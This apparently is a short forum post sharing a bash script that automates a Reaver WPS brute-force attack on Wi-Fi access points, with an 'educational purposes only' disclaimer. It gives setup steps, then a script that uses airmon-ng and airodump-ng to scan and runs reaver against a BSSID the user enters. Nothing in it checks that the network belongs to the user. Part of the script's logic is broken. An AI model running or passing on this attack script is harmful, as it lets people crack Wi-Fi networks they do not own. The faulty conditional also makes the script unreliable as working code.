Hello all,
Here is a simple script to automate and explorer the reaver exploit and test your
Wi-Fi access points againts reaver
The below assumes you have reavers installed !
Please Note: This information and script is for educational purposes only
i am not respoisble for any actions taken on your part !
to use this script type in the following command in your terminal
sudo nano filename.sh
copy and paste the below script
ctrl-o then hit enter
ctrl-x then hit enter
chmod +x filename.sh
To run this script in your terminal type ./filename.sh
Start of script
#!/bin/bash
echo “Its cracking time !!!!!!”
sudo iwconfig
sudo airmon-ng start wlan0
sudo airmon-ng start mon0
sudo airodump-ng mon0
echo “Enter the bssid ”
read bssid
sudo reaver -i mon0 -b $bssid -vv
if $bssid =” no ”
then end
fi
sudo airmon-ng stop mon0
sudo airmon-ng stop mon1
sudo airmon-ng stop mon2
sudo airmon-ng stop mon3
echo “Good bye sir ”